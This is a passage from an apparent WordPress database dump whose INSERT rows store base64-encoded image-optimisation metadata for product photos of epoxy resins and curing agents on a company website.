0ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyOC0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTAxMiwiaWQiOjE0NjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjgtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjgtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjgtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkwMTQsImlkIjoxNDY0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI4LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI4LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI4LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MDE3LCJpZCI6MTQ2NH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyOC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyOC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyOC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTAxOSwiaWQiOjE0NjR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjgtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjgtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjgtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkwMjIsImlkIjoxNDY0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29428, 1463, 'wpfc_optimisation_reduction', '2559099'); 
INSERT INTO `wp_postmeta` VALUES (29429, 1463, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYuanBnIiwicmVkdWN0aW9uIjoyNTU4OTU2LCJ0aW1lIjoxNDgzNTY5MDMzLCJpZCI6IjE0NjMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTAzNiwiaWQiOjE0NjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MDQwLCJpZCI6MTQ2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkwNDMsImlkIjoxNDYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MDQ3LCJpZCI6MTQ2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkwNTAsImlkIjoxNDYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTA1MiwiaWQiOjE0NjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MDU1LCJpZCI6MTQ2M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkwNTgsImlkIjoxNDYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxMjksInRpbWUiOjE0ODM1NjkwNjAsImlkIjoxNDYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MDYzLCJpZCI6MTQ2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTA2NiwiaWQiOjE0NjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkwNjgsImlkIjoxNDYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWVwb24tcmVzaW4tODI2LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MDcxLCJpZCI6MTQ2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcG9uLXJlc2luLTgyNi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTA3MywiaWQiOjE0NjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBvbi1yZXNpbi04MjYtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkwNzYsImlkIjoxNDYzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29430, 1462, 'wpfc_optimisation_reduction', '2509935'); 
INSERT INTO `wp_postmeta` VALUES (29431, 1462, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwaWt1cmUtMzE0MC1jdXJpbmctYWdlbnQuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBpa3VyZS0zMTQwLWN1cmluZy1hZ2VudC5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWVwaWt1cmUtMzE0MC1jdXJpbmctYWdlbnQuanBnIiwicmVkdWN0aW9uIjoyNTA5OTAwLCJ0aW1lIjoxNDgzNTY5MDg4LCJpZCI6IjE0NjIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcGlrdXJlLTMxNDAtY3VyaW5nLWFnZW50LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwaWt1cmUtMzE0MC1jdXJpbmctYWdlbnQtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBpa3VyZS0zMTQwLWN1cmluZy1hZ2VudC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU2OTA5MCwiaWQiOjE0NjJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvaGV4aW9uLWVwaWt1cmUtMzE0MC1jdXJpbmctYWdlbnQtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBpa3VyZS0zMTQwLWN1cmluZy1hZ2VudC04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2hleGlvbi1lcGlrdXJlLTMxNDAtY3VyaW5nLWFnZW50LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MDkzLCJpZCI6MTQ2Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBpa3VyZS0zMTQwLWN1cmluZy1hZ2VudC03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcGlrdXJlLTMxNDAtY3VyaW5nLWFnZW50LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvaGV4aW9uLWVwaWt1cmUtMzE0MC1jdXJpbmctYWdlbnQtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NjkwOTYsImlkIjoxNDYyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcGlrdXJlLTMxNDAtY3VyaW5nLWFnZW50LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2hleGlvbi1lcGlrdXJlLTMxNDAtY3VyaW5nLWFnZW50LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9oZXhpb24tZXBpa3VyZS0zMTQwLWN1cmluZy1hZ2VudC0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTY5MTAwLCJpZCI6MTQ2Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9oZXhpb24tZXBpa3VyZS0zMTQwLWN1cmluZy1hZ2VudC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVu